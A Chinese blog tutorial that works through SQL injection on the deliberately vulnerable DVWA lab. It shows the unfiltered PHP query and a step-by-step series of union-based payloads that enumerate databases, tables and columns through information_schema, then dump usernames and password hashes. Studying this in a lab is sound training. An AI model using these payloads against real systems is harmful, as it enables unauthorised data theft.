DVWA亲测SQL注入漏洞
admin
2023-01-30 05:04:49
0
介绍:

关于sql注入的基础知识,我上篇文章也写过了,这篇就用靶机的漏洞环境来实践操作一下,所谓实践出真理嘛,我们这次试用的漏洞平台是DVWA,Github下载地址:DVWA
关于一下注入的基本知识或者姿势,我会在实践中详解。

实验:

LOW等级
先输入1看一下
DVWA亲测SQL注入漏洞
我们在加个单引号
DVWA亲测SQL注入漏洞
这里的搜索框为什么没有显示单引号呢?因为被url编码了
一般的url编码其实就是那个字符的ASCII值得十六进制,再在前面加个%。
具体可以看URL编码,这里可以查到每个字符的url编码,当然自己编程或者用该语言应该也有自带的函数,去实现url编码。
这里说下sql注入中常见的url编码:
空格是%20
单引号是%27
井号是%23(表注释)
双引号是%22
看报错我们能看到,这是由' '两个单引号扩起来的参数,看看源代码
DVWA亲测SQL注入漏洞
我们看

$query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"
$id = $_REQUEST[ 'id' ];

参数没有经过任何的过滤....我们尝试闭合单引号。
比如我们输入id=1' or '1'='1
语句就变成了

$query  = "SELECT first_name, last_name FROM users WHERE user_id = '1' or '1'='1';";

当然,我们也可以使用注释来注释后面的单引号
sql中注释 单行可以使用 #(忽略) --(忽略),多行使用/ /
我们试试1' #
DVWA亲测SQL注入漏洞
下面我们来利用漏洞获取数据库信息
大概步骤就是:
1.猜解所查询的字段数目
2.获取字段显示位
3.通过显示位获取数据库信息
4.获取数据库中的表名
5.获取表中的列名(字段)
6.导出数据库中的数据
7.验证导出数据的有效性
猜解所查询的字段数
方式1: order by num
若num数值超过了字段数,则查询会报错,从而判断出select语句所查询字段的数目
输入:
1' order by 2 #
DVWA亲测SQL注入漏洞
1' order by 3 #
DVWA亲测SQL注入漏洞
报错,说明数据表中只有两个字段
方式二:union select 1,2,3...
若union select后的数字位(不一定是1/2/3,只要有数字占位即可)与实际查询的字段位不完全对应时,查询就会报错,直至调整到不报错时的占位个数,从而判断实际查询的字段数
输入:union select 1,2 #
DVWA亲测SQL注入漏洞
输入:union select 1,2.3 #
DVWA亲测SQL注入漏洞
获取字段的显示位
1' union select 1,2 #
DVWA亲测SQL注入漏洞
既然显示位显示的是我们设定数值,那么我们就通过显示位获取数据,输出出来
通过显示位获取数据库信息
此处会用到Mysql注入常用的一些函数,可参看此文==>SQL注入常用的内置函数整理(以MySql为例)
获取当前连接的数据库名称、DBMS的版本(Mysql的版本)
1' union select database(),version() #
DVWA亲测SQL注入漏洞
获取当前连接数据库的用户
1' union select 1,user() #
DVWA亲测SQL注入漏洞
获取服务器的操作系统、数据库的存储目录
1' union select @@version_compile_os,@@datadir #
DVWA亲测SQL注入漏洞
获取数据库中所有数据库名
在此之前,科普一下数据库的知识
mysql的数据库information_schema,他是系统数据库,安装完就有,记录是当前数据库的数据库,表,列,用户权限等信息
information_schema.schemata 记录所有的数据库名称
Information_schema.tables: 记录表名信息的表(也有数据库名字段)
Information_schema.columns: 记录列名信息的表(数据库名、表名、字段名)
1' union select 1,schema_name from information_schema.schemata # 可能是权限问题,没有全部爆出来
DVWA亲测SQL注入漏洞
去数据库执行是这样的
DVWA亲测SQL注入漏洞
我们发现数据库dvwa正是我们想要的,因此,通过此数据库,去爆表
获取当前连接数据库(dvwa)中的所有表
1' union select 1,table_name from information_schema.tables where table_schema="dvwa" #
where .. 后面表示的限制的条件,只查数据库名是dvwa的表
DVWA亲测SQL注入漏洞
获取表中的列名(字段)
1' union select 1,column_name from information_schema.columns where table_name="users" #
DVWA亲测SQL注入漏洞
这样输出有点乱,我们使用group_concat()将他们简单的输出出来
1' union select 1,group_concat(column_name) from information_schema.columns where table_name="users" #
DVWA亲测SQL注入漏洞
如果你觉得有点挤,看的不舒服的话,你可以
1' union select 1,group_concat(column_name,' ') from information_schema.columns where table_name="users" #
DVWA亲测SQL注入漏洞
这样是不是就明显多了?关于group_concat(),还有concat()可以自行百度学习
知道了数据库的表名、字段名就可以爆表了
爆表
1' union select 1,concat(user,'--',password) from users #
DVWA亲测SQL注入漏洞
还有其他更多的导出操作,一些导出函数的使用,可以自行尝试
验证导出数据的有效性
DVWA亲测SQL注入漏洞
OK!!
Medium
只是闭合方式不同
DVWA亲测SQL注入漏洞
其余操作步骤与上差不多
high
DVWA亲测SQL注入漏洞
想办法闭合,其他就自然好起来了!

相关内容

热门资讯

德国总理:美国正在被伊朗羞辱 德国之声4月27日报道,德国总理默茨在访问一所学校时表示,在当前的持续冲突中,伊朗领导层正试图羞辱美...
理响中国|“长”歌以行,风云激... 光阴如梭,东方潮阔。这里是中国的长三角,世界的长三角。无论过去、现在还是未来,这片土地都因时代而生,...
白宫:特朗普及其国安团队开会讨... 新华社华盛顿4月27日电 美国白宫新闻秘书莱维特27日在记者会上证实,总统特朗普及其国家安全团队当天...
人民日报刊文:日本放开杀伤性武... 日本放开杀伤性武器出口推高地缘冲突风险(国际论坛)常思纯《人民日报》(2026年04月28日 第 0...
医疗保障法草案二审:明确生育保... 满足多样化健康保障需求本报记者 彭 波4月27日,医疗保障法草案二审稿提请十四届全国人大常委会第二十...
天津一景区发生自转旋翼机事故1... 澎湃新闻记者 吕新文中国民用航空华北地区管理局4月22日公布《豪客通航“10•1”天津长芦汉盐旅游区...
卡塔尔埃米尔与美国总统特朗普通... 当地时间24日,卡塔尔埃米尔塔米姆与美国总统特朗普通电话,重点就中东地区局势以及伊朗与美国谈判问题交...
男子30年前被扣押2859克黄... 澎湃新闻记者 王鑫家住辽宁省大连市的潘永嘉近日向澎湃新闻反映称,三十年前,他在大连周水子机场被盖州市...
商务部:取消反制欧盟两家金融机... 中华人民共和国商务部令二〇二六年 第1号鉴于欧盟已取消对中国两家金融机构的制裁措施,现公布《关于取消...
过去24小时共有5艘船只通过霍... 总台记者当地时间24日获悉,过去24小时内,共有5艘船只通过霍尔木兹海峡,其中包括一艘伊朗油轮。(总...